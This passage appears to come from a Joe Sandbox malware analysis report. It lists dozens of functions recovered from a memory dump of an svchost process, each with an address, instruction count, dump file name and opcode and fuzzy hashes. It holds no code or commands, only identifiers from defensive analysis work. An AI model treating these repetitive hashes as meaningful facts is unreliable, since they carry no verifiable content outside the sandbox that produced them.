                                                                                        • Instruction Fuzzy Hash: D001863A700205A7CB12DADEDD00F9FBA6C9F94681B1544A9BD15DB160EA70DA01C760
                                                                                        Function 0386D1D0 Relevance: .0, Instructions: 47COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
                                                                                        • Instruction ID: e8bb8f9f6b291edd4a5b00685aac97dfb23511d40e7dc433045e46a61223be4c
                                                                                        • Opcode Fuzzy Hash: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
                                                                                        • Instruction Fuzzy Hash: 3901D47AB01648DBD711DAE8E801F65B3A9ABC4624F1481D5FA26CF380DB74E905C791
                                                                                        Function 0382826B Relevance: .0, Instructions: 46COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7fb149136edb9a52abf22e35c5f271194a583892036c5671aa6f312ccac4ef1c
                                                                                        • Instruction ID: 7263a73830dae6f78a2582caa3b365e12c3ee045163282bda2bd1702c0fe42df
                                                                                        • Opcode Fuzzy Hash: 7fb149136edb9a52abf22e35c5f271194a583892036c5671aa6f312ccac4ef1c
                                                                                        • Instruction Fuzzy Hash: 0201F735700A18DFCB14EBF9DC149AEBBB9EF84210F1940E99902EF640EE30DD41C6A1
                                                                                        Function 0384E016 Relevance: .0, Instructions: 46COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                        • Instruction ID: 11027540bb10607d3669843c2b857c968a7747b24058b5db3437c855e9fcc3d7
                                                                                        • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                        • Instruction Fuzzy Hash: 1F015A722006889FD322D79DC948F36B7ECFB85754F0D04E2E815CBA91D768EC40C621
                                                                                        Function 038EF367 Relevance: .0, Instructions: 45COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e337124a151b08cfea9fe81adcf17bd34289af846ab48b817b6d001b1f841f89
                                                                                        • Instruction ID: 257dd4f4d73b4d2bc410d53b9cd10f01199d16b70803c343e5fc5d096f426eb6
                                                                                        • Opcode Fuzzy Hash: e337124a151b08cfea9fe81adcf17bd34289af846ab48b817b6d001b1f841f89
                                                                                        • Instruction Fuzzy Hash: 7C017C75A10358ABDB10EBE9D805FAEBBB8EF84700F0440A6A500EB280D6B4D900C7A5
                                                                                        Function 038F972B Relevance: .0, Instructions: 44COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                                                                        • Instruction ID: e55596d33dfde9271844e2881c656f44701300612e66d90dcfe3f6a49795b747
                                                                                        • Opcode Fuzzy Hash: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                                                                        • Instruction Fuzzy Hash: 2111A5B1A106219FDB88CF2DC0C0651BBE8FB88350B0582AAED18CB74AD374E915CF94
                                                                                        Function 03905636 Relevance: .0, Instructions: 44COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c1bbed04bbb84a1ddaf117942a8a538d7bfc2e6232f30667ed9f109f28d9b914
                                                                                        • Instruction ID: a7e5e9c3d6330e8d4c56dfffac5a353d1197ee5dc3d8deee61ba3945fc6a3111
                                                                                        • Opcode Fuzzy Hash: c1bbed04bbb84a1ddaf117942a8a538d7bfc2e6232f30667ed9f109f28d9b914
                                                                                        • Instruction Fuzzy Hash: D3116D78D10249EFCB04EFA9D440A9EB7B8EF18304F14849AA814EB380E674DA02CB95
                                                                                        Function 0382C310 Relevance: .0, Instructions: 43COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                        • Instruction ID: 0b1f3a4e174359e6db7e511f77e6f2ee85ff3bd97ef0a874183762ea906ab57e
                                                                                        • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                        • Instruction Fuzzy Hash: 62F04C372447329BC732D6DD4884F7FADB58FC5AA4F1900B5E109DF200CA648C4192D1
                                                                                        Function 03905152 Relevance: .0, Instructions: 43COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 246a773f1db98ba280226daadf85c7268bce2af37866d501b109f9653f06a9ee
                                                                                        • Instruction ID: 5e23e773f760dc0ceaae73d371b3d36cdce053de3685ec2c2dafa59e0dacebd0
                                                                                        • Opcode Fuzzy Hash: 246a773f1db98ba280226daadf85c7268bce2af37866d501b109f9653f06a9ee
                                                                                        • Instruction Fuzzy Hash: 3F012C75A1020DAFDB00DFA9D941AEEBBF8FF49300F14405AE904FB380D674EA018BA1
                                                                                        Function 039050D9 Relevance: .0, Instructions: 43COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 155f7a2ce994a8b40b68515c562834df5be29127a0037f2b351973bd89d24084
                                                                                        • Instruction ID: b8dac4dd90754a9b01353871c46b71a4373d09b311690226ddca7e6285a90ec3
                                                                                        • Opcode Fuzzy Hash: 155f7a2ce994a8b40b68515c562834df5be29127a0037f2b351973bd89d24084
                                                                                        • Instruction Fuzzy Hash: 9E011AB5A00209AFDB00DFA9D941AAEB7B8EF49344F54405AE504FB280D674E9018BA1
                                                                                        Function 03905060 Relevance: .0, Instructions: 43COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 33be8875524c6ed0dff03e556365f18b43421474942bc77df7f47db9fdb07b41
                                                                                        • Instruction ID: bfaf13eb2ebfadf28984fa2d73ccb74490f52bd4b2b3fba54c434aa23b8f61fa
                                                                                        • Opcode Fuzzy Hash: 33be8875524c6ed0dff03e556365f18b43421474942bc77df7f47db9fdb07b41
                                                                                        • Instruction Fuzzy Hash: 4E015A75A00209AFCB00EFA9D941AAEB7B8EF48300F10405AE904EB381D674EA018BA1
                                                                                        Function 0385C073 Relevance: .0, Instructions: 43COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                        • Instruction ID: c6cb39affcd8a52afe491d59e4b0df5159c1b9148d300b37978d95ba03245b83
                                                                                        • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                        • Instruction Fuzzy Hash: 9CF0C2B3600614ABD324CF8DDC40E57FBFADBC0A80F088168E905CB220EA31DD04CB90
                                                                                        Function 03865734 Relevance: .0, Instructions: 43COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                                                                        • Instruction ID: 3423cd3b4ff26849d71edb093773f1c78421f477a55fe09a6a0354dae4d0cd8b
                                                                                        • Opcode Fuzzy Hash: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                                                                        • Instruction Fuzzy Hash: 70F0FF72A01214AFE719CF9CC840F6AF7EDEB46650F0940B9D500DF230E671DE04CA94
                                                                                        Function 038EF78A Relevance: .0, Instructions: 42COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d788facf7bf7f9fc3fb240d136ad1b0d161697bdc3f534dc3a8e6d6ad1b74213
                                                                                        • Instruction ID: adc10705f3392c4cbb523ad08529d9e0e8761c95af5390a976b5ac8a9cba885c
                                                                                        • Opcode Fuzzy Hash: d788facf7bf7f9fc3fb240d136ad1b0d161697bdc3f534dc3a8e6d6ad1b74213
                                                                                        • Instruction Fuzzy Hash: F4010CB5E0074DAFCB04DFE9D545AAEBBF4EF48304F1080AAA955EB341E674DA00DB91
                                                                                        Function 038EF2F8 Relevance: .0, Instructions: 41COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a13ad8f3cc0a448f260e25fd485991483baa44de075567051e844a5659dc9d68
                                                                                        • Instruction ID: a0b8e872d4dee0b8baf5d719cf44393ceb215648917a5e201eedf3b1e18a22fe
                                                                                        • Opcode Fuzzy Hash: a13ad8f3cc0a448f260e25fd485991483baa44de075567051e844a5659dc9d68
                                                                                        • Instruction Fuzzy Hash: CBF0C876B10348ABDB04DFFDC805AEEB7B8EF44710F008096E501FB280DAB4D9018792
                                                                                        Function 039061E5 Relevance: .0, Instructions: 41COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c498d5d1fa49c9820167b68c11864f668dd4e776be9d8d5a4d1c42e172b267ec
                                                                                        • Instruction ID: b17ad0ee4a4d1713b018de4e20155c2d12bea5f02d7c52d068076c90ce0dea34
                                                                                        • Opcode Fuzzy Hash: c498d5d1fa49c9820167b68c11864f668dd4e776be9d8d5a4d1c42e172b267ec
                                                                                        • Instruction Fuzzy Hash: D6018F71A00258DFCB00DFA9D841AEEB7F8EF48310F14005AE500EB280D778EA01CB95
                                                                                        Function 0386724D Relevance: .0, Instructions: 40COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 44620c8b90c707c3135ebb5afdba643e124f7b09bfea536c61b6b3c3b840e391
                                                                                        • Instruction ID: e5d1f09012d66fa4313cf92b08ec2fdf5c90daa5caa490627033a17b6026e4e4
                                                                                        • Opcode Fuzzy Hash: 44620c8b90c707c3135ebb5afdba643e124f7b09bfea536c61b6b3c3b840e391
                                                                                        • Instruction Fuzzy Hash: 98F06275A11359ABEB14D7FA8940FABBBA99F84618F0885E5B903DB344DA30E940C7D0
                                                                                        Function 039053FC Relevance: .0, Instructions: 39COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8f57e03f9554dedaa5501d65449fb223a6708ae859e504a278bdbac206c9548d
                                                                                        • Instruction ID: 8be5c78b239890a80854597e1f7b18bbdc3a361c01ffdf0308051dc7b24675dc
                                                                                        • Opcode Fuzzy Hash: 8f57e03f9554dedaa5501d65449fb223a6708ae859e504a278bdbac206c9548d
                                                                                        • Instruction Fuzzy Hash: 02011AB4A00209DFDB04DFA9D545B9EF7F4FF08300F1482A9A519EB381EA74DA408B91
                                                                                        Function 0382C0F0 Relevance: .0, Instructions: 39COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 423b2fb61ea17f914a6f12181432686f1614bbde9fc3dcdc753582dc4d1a0560
                                                                                        • Instruction ID: a4009ef82eb35b03f96767027d7ea5ebd7d77acfe32c9b2e7e486fcc6f295dff
                                                                                        • Opcode Fuzzy Hash: 423b2fb61ea17f914a6f12181432686f1614bbde9fc3dcdc753582dc4d1a0560
                                                                                        • Instruction Fuzzy Hash: 44F024712043245BF760D6D99C02B763AAAEBC0750F2980EAEB05CF2C0FA70EC81C395
                                                                                        Function 03903749 Relevance: .0, Instructions: 38COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9c86c39bdb6e5f373c63bc0b61fffc749c090866831c7dd43b14b299580d1563
                                                                                        • Instruction ID: 794c41c93d8acfb2c94113d0677bc6ed69e7c92c0fcec770fc435a836b613374
                                                                                        • Opcode Fuzzy Hash: 9c86c39bdb6e5f373c63bc0b61fffc749c090866831c7dd43b14b299580d1563
                                                                                        • Instruction Fuzzy Hash: CFF0447A540304BFE711DBA8CD41FDA77BCDB04710F100565A555DA1D0E670EA44CB91
                                                                                        Function 038D437C Relevance: .0, Instructions: 37COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                        • Instruction ID: d887b10f1b2b6fa9c979053d0fc331dfcfcd96bcc4e643872593e0268f20c85a
                                                                                        • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                        • Instruction Fuzzy Hash: 37F05435341A1247DB7EFAEF9810E2FE3559FC0A50B4905AC9455CBE40DF70D8018791
                                                                                        Function 038EF3E6 Relevance: .0, Instructions: 35COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 609f11c4b721b3c11ec2cb299175920e264ac7cc1e26405d47101fab62807d3f
                                                                                        • Instruction ID: ca695dbb5a8e13d28bbd6fe42c0ab44116540cb035cb986b2af8780b64ffc6d9
                                                                                        • Opcode Fuzzy Hash: 609f11c4b721b3c11ec2cb299175920e264ac7cc1e26405d47101fab62807d3f
                                                                                        • Instruction Fuzzy Hash: 4AF03775A0124CEFCB04EFE9D545A9EB7F4EF48304F4080A9B945EB381E674EA01CB56
                                                                                        Function 038292FF Relevance: .0, Instructions: 35COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c68d662f37bdd7fc91e1c0b28293c28cc9f51470427eaeb3dbe26f398943ffe4
                                                                                        • Instruction ID: 1ac8ab2c786f6bde5c93fb023f66ef8d84cfc15166e85a7ad9be4f2759058aef
                                                                                        • Opcode Fuzzy Hash: c68d662f37bdd7fc91e1c0b28293c28cc9f51470427eaeb3dbe26f398943ffe4
                                                                                        • Instruction Fuzzy Hash: DAF0FA32200744ABC731EB89DC08F9BBBEDEFC4B00F0801A9E942C3090C7A0A948C660
                                                                                        Function 038347FB Relevance: .0, Instructions: 33COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 58e071acea204730354d6dec50616f1bfd73a2dd490423b39f75fc31ba085ebd
                                                                                        • Instruction ID: 6d6a7fb148cec79891673765d69b0f70a638e70f9a326a26c4688df6790687f2
                                                                                        • Opcode Fuzzy Hash: 58e071acea204730354d6dec50616f1bfd73a2dd490423b39f75fc31ba085ebd
                                                                                        • Instruction Fuzzy Hash: A1F090399127D49EDB21CBDAC448B21B7D8DB0A664F0C89EAD589C7741C724D881CA91
                                                                                        Function 038EF6C7 Relevance: .0, Instructions: 33COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: bba9a462ac7c5dc9dea83968bd082fcf734e97d112c4afaef4fd4e1c91dbe82d
                                                                                        • Instruction ID: d355cc69b48d65df15e0527f5c6d2d4d582b6ae904a597416c9c90b57135178d
                                                                                        • Opcode Fuzzy Hash: bba9a462ac7c5dc9dea83968bd082fcf734e97d112c4afaef4fd4e1c91dbe82d
                                                                                        • Instruction Fuzzy Hash: 4BF06D79A10388EBDB04EFE9D805EAEB7F4AF48304F0440A9E505EB281E674D900DB55
                                                                                        Function 038F0115 Relevance: .0, Instructions: 32COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e9b6f623079c9d7cebec46118b841e7e63f16eec37d4519a78d1f96d57c11395
                                                                                        • Instruction ID: 5092f83974b846c82fe702aa16cae338330e8b776bb3447f30180f112e6c044f
                                                                                        • Opcode Fuzzy Hash: e9b6f623079c9d7cebec46118b841e7e63f16eec37d4519a78d1f96d57c11395
                                                                                        • Instruction Fuzzy Hash: DFF0A7BE41EBD44ECF32FBA86490291AF599757150F1D14C5C6A1DF607C9B488C3C725
                                                                                        Function 0390539D Relevance: .0, Instructions: 31COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 37117793c08c0434ea8c8fe1d2753ae3e2c09f8a076ab731209bc069471afa16
                                                                                        • Instruction ID: f7d37a81ecd1a2d6bb42870b64de9fdec2245712d13025ce378b37cd2565dce0
                                                                                        • Opcode Fuzzy Hash: 37117793c08c0434ea8c8fe1d2753ae3e2c09f8a076ab731209bc069471afa16
                                                                                        • Instruction Fuzzy Hash: 8EF0B474A1434CDFDB04EBB9D441F5DB7B4EF04300F108094E501EB280DAB4D901CB25
                                                                                        Function 03905283 Relevance: .0, Instructions: 31COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 655be8409b93bd4b333a4f5b98acfe89a8865a5520c88d99c9e52a9cdb923fb9
                                                                                        • Instruction ID: bd1298365fa938635cff3dc2e85bfcda3522feeee2576f970e336addee986f81
                                                                                        • Opcode Fuzzy Hash: 655be8409b93bd4b333a4f5b98acfe89a8865a5520c88d99c9e52a9cdb923fb9
                                                                                        • Instruction Fuzzy Hash: 7FF0BE78A14308EFDB04EBA9D901EAEB7F8BF04300F044498A441EB2C1EA74D9008B52
                                                                                        Function 039052E2 Relevance: .0, Instructions: 31COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f8df9835616f900361fd307f8253f4b9c0a8139d5beaad27eb12038f15bb37f3
                                                                                        • Instruction ID: 34aa2c24b242121dab6ebbb2683f0e7fee4112d6493c7397facc138765e2c59a
                                                                                        • Opcode Fuzzy Hash: f8df9835616f900361fd307f8253f4b9c0a8139d5beaad27eb12038f15bb37f3
                                                                                        • Instruction Fuzzy Hash: B3F0BE74A14348EFDB04EFB9E901E6EB3B8AF14300F044498A401EB2C0EAB4D900CB56
                                                                                        Function 03872619 Relevance: .0, Instructions: 31COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                        • Instruction ID: 2b196d2574d0054ff66c72aa8ce1ecf064b8e1169ef6af31fd71a990113e842b
                                                                                        • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                        • Instruction Fuzzy Hash: B9E092723006002BD721DE9DCC80F47776EAF82B10F0404BAB5049E251CAE2DC0982A5
                                                                                        Function 03905341 Relevance: .0, Instructions: 30COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 31e0839993288a57cac8383f53f03b8fd6a8f4406e577daa776e8e1afba568c8
                                                                                        • Instruction ID: eb33f2b586155989a9b2eb6c022b79a4f429f232fbf620d46ace4b7bc60fe61f
                                                                                        • Opcode Fuzzy Hash: 31e0839993288a57cac8383f53f03b8fd6a8f4406e577daa776e8e1afba568c8
                                                                                        • Instruction Fuzzy Hash: 84F08274A0424CEFDB04EBB9D945E9EB7B8AF49244F540499A501EB2D0EA74D9008716
                                                                                        Function 03867208 Relevance: .0, Instructions: 30COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
